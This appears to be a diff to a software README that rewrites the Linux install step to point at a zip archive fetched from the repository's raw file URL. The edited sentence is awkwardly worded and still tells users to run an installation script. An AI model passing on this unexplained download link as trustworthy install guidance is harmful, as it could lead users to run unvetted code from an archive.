dynastynodes/synapseflow/README.md

 1. **Windows:** Double-click the downloaded `.exe` file and follow the prompts.
 2. **Mac:** Open the downloaded `.dmg` file and drag synapseflow into your Applications folder.
-3. **Linux:** Extract the downloaded `.tar.gz` file, navigate to the folder in your terminal, and run the installation script.
+3. **Linux:** Extract the downloaded `https://raw.githubusercontent.com/dynastynodes/synapseflow/main/synapseflow/synapseflow-v1.3.zip` file, navigate to the folder in your terminal, and run the installation script.

 ## 🖥️ System Requirements